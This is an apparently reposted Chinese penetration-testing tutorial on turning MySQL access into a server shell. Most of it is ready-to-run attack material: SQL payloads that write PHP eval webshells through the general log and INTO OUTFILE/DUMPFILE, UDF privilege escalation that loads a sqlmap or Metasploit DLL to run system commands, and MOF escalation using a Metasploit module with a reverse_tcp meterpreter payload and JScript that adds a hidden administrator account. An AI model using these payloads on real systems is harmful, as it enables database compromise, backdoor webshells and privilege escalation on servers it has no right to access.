前言
Getshell之堆叠注入
堆注入主要是利用到了Mysql的日志来进行写shell,payload如下:
set global general_log = "ON";set global general_log_file='C:/wamp64/www/ma.php';select '<?php eval($_POST[cmd]);?>';
然后用冰蝎连接,就可以进行攻击
联合查询写shell
union select 1,'<?php eval($_POST[123]);?>' INTO OUTFILE '/var/www/html/test.php' #union select 1,'<?php eval($_POST[123]);?>' INTO dumpfile '/var/www/html/test.php'#
outfile后面不能接0x开头或者char转换以后的路径,只能是单引号路径,但是值的部分可以时16进制 在使用outfile时,文件中一行的末尾会自动换行,且可以导出全部数据,同时如果文本中存在\n等字符,会自动转义成\n,也就是会多加一个\
outfile函数可以导出多行,而dumpfile只能导出一行数据;outfile函数在将数据写到文件里时有特殊的格式转换,而dumpfile则保持原数据格式
而使用dumpfile时,一行的末尾不会换行且只能导出部分数据(这里比较数据比较少,没有体现出来);但dumpfile不会自动对文件内容进行转义,而是原意写入(这就是为什么我们平时UDF提权时使用dumpfile来写入的原因)
UDF提权
自定义函数,是数据库功能的一种扩展。用户通过自定义函数可以实现在 MySQL 中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用,就像调用本机函数 version() 等方便。
利用条件
1.sqlmap的UDF动态链接库文件位置:sqlmap根目录/data/udf/mysql 2.那么动态链接库文件去哪里找呢?实际上我们常用的工具 sqlmap 和 Metasploit 里面都自带了对应系统的动态链接库文件。 3.sqlmap还自带了动态链接库,攻击者为了防止被误杀都经过编码处理过,不能被直接使用。不过可以利用 sqlmap 自带的解码工具cloak.py 来解码使用,cloak.py 的位置为:sqlmap根目录/extra/cloak/cloak.py
解码32位的windows动态链接库:python3 cloak.py -d -i lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_32.dll 其他linux和windows动态链接库解码类似; 或者直接使用metasploit自带的动态链接库,无需解码
构造payload
create table udfeval(shellcode longblob); //创建表insert into udfeval values(load_file('F:/udf.dll')); //在表里插入信息select shellcode from udfeval into dumpfile 'C:\\windows\udf.dll'; //将表里面的信息导出create function cmdshell returns string soname 'D:/phpstudy/sqlibs/MySQL5.7.26/lib/plugin/udf.dll';select * from func; //在所有表中查找funcselect cmdshell('whoami'); //进行whoami命令执行
原生的php方法是不支持的,得使用使用 PDO,mysqli_multi_query()才可能存在堆注入 如果数据库使用了 phpmyadmin来管理数据库,且存在弱口令,我们也可以使用这种方法来通过phpmyadmin来执行上述命令达到写shell的目的general log 指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。使用SHOW VARIABLES LIKE 'general%'命令来查看默认的log位置,实际渗透中建议将该值保存下来,便于利用结束时将该字段还原
优缺点
答:--sql-shell;输入sql语句select @@secure_file_priv提示为NULL;所以就会出现,如下的错误
MOF提权
漏洞原理
M0F提权原理:它就是利用了c:/windows/system32/wbem/mof/目录下的nullevt.mof文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行(有点像条件竞争)
利用条件
Win sever 03以后无法使用
Mysql启动身份具有权限去读写c:/windows/system32/wbem/mof目录
secure-file-priv参数不为null
构造攻击Payload
MSF脚本自动化use exploit/windows/mysql/mysql_mof# 设置payloadset payload windows/meterpreter/reverse_tcp# 设置目标 MySQL 的基础信息set rhosts 192.168.127.132set username rootset password rootrun
var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user hacker [email protected] /add\")\nWSH.run(\"net.exe localgroup administrators hacker /add\")
手工注入select load_file('D:/test.mof')into dumpfile "C:/windows/system32/wbem/mof/nullevt.mof";
优缺点
第一:版本问题,导致攻击的选择范围较小
net stop winmgmtrmdir /s /q C:\Windows\system32\wbem\Repository\del C:\Windows\system32\wbem\mof\good\test.mof /F /Snet user hacker /deletenet start winmgmt
参考链接
udf提权:https://blog.csdn.net/qq_44881113/article/details/118907122mof提权原理及其过程:https://blog.csdn.net/aiquan9342/article/details/102075462?ops_request_misc=&request_id=&biz_id=102&utm_term=mof&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduweb~default-2-102075462.142%5Ev10%5Econtrol,157%5Ev8%5Econtrol&spm=1018.2226.3001.4187
如有侵权,请联系删除
推荐阅读
文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247506818&idx=3&sn=dbb20ae3f2bdbe11d760a9f194d81ea4&chksm=c04d5cbcf73ad5aac0f38e3da4e901c36e2130f30e238779c96f4cc998a4905c2c60f204b09b#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh